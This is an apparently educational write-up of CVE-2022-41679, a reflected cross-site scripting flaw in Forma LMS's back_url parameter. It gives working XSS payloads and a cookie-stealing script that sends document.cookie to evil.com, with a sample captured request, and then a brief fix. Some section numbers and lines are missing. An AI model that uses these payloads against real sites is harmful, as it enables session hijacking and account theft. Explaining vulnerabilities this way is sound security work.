Forma LMS is a popular open-source Learning Management System used by organizations worldwide to deliver online courses. Unfortunately, up to version 3.1., Forma LMS contained a dangerous security bug that let hackers easily run malicious JavaScript code in a victim’s browser. This bug is officially listed as CVE-2022-41679.
In this long read, we’ll break down how the vulnerability works, demonstrate a real exploit, and show how serious the consequences can be if it’s not fixed. All technical content is original, exclusive, and aimed at readers with basic web security knowledge.
What is Cross-Site Scripting (XSS)?
Cross-Site Scripting (XSS) is a type of security hole where an attacker can inject client-side scripts—usually JavaScript—into web pages that other users visit. This can allow hackers to steal cookies, session tokens, or even take over the user’s account.
In Forma LMS 3.1. and earlier, the vulnerable code can be found in the following URL
/appLms/index.php?modname=faq&op=play&back_url=<payload>
The back_url GET parameter isn’t filtered or sanitized before being echoed/injected into the page. If you add a JavaScript payload to this parameter, it gets executed in the browser of anyone who visits the crafted link.
Here are some references for further reading and verification
- Forma LMS Release Notes
- NVD Entry for CVE-2022-41679
- Forma LMS GitHub Repository
- OWASP XSS Cheat Sheet
3. Step-by-Step Exploit Explanation
Let’s see exactly how an attacker could use this bug, including sample code.
Proof of Concept (PoC) Exploit
Suppose you know a user has access to a Forma LMS instance at https://example.com/appLms/. You can craft the following malicious link:
https://example.com/appLms/index.php?modname=faq&op=play&back_url=%22%3E%3Cscript%3Ealert('XSS%20by%20attacker')%3C/script%3E
%3E → >
- The rest is a classic script tag payload: <script>alert('XSS by attacker')</script>
So, the full payload is:
"><script>alert('XSS by attacker')</script>
This breaks out of any HTML attribute and injects JavaScript.
Example (Readable Link)
https://example.com/appLms/index.php?modname=faq&op=play&back_url="><script>alert('XSS by attacker')</script>
If a logged-in admin or user is tricked into clicking this link (e.g., by email), the JavaScript code is executed in their browser.
Stealing Cookies with XSS
Let’s upgrade the attack. An attacker can steal cookies using a payload like this (injected into back_url):
"><script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>
This causes the victim’s browser to send their cookie to the attacker’s server at evil.com.
Example Exploit Snippet
fetch('https://evil.com/steal?cookie=' + document.cookie);
Here’s a sample stolen cookie request an attacker would see on their server
GET /steal?cookie=PHPSESSID=abc123; user=admin HTTP/1.1
Host: evil.com
5. How to Fix This Vulnerability
The best way to fix this XSS issue is to always sanitize and validate input coming from user-controlled sources, especially when outputting to HTML.
Key recommendations
- Escape any untrusted input: Use htmlspecialchars or similar when echoing values in PHP.
6. Conclusion
CVE-2022-41679 is a serious reminder of why input validation and output encoding are critical for web security. If you’re running Forma LMS 3.1. or below, patch today—and always treat user-supplied data as unsafe.
Stay safe, and always keep your software updated!
Further Reading:
- OWASP XSS Prevention Cheat Sheet
- Forma LMS GitHub Security Fixes
Note: This article is for educational awareness only. Do not exploit this vulnerability on systems you do not own or have permission to test.
Timeline
Published on: 10/31/2022 20:15:00 UTC
Last modified on: 11/01/2022 19:57:00 UTC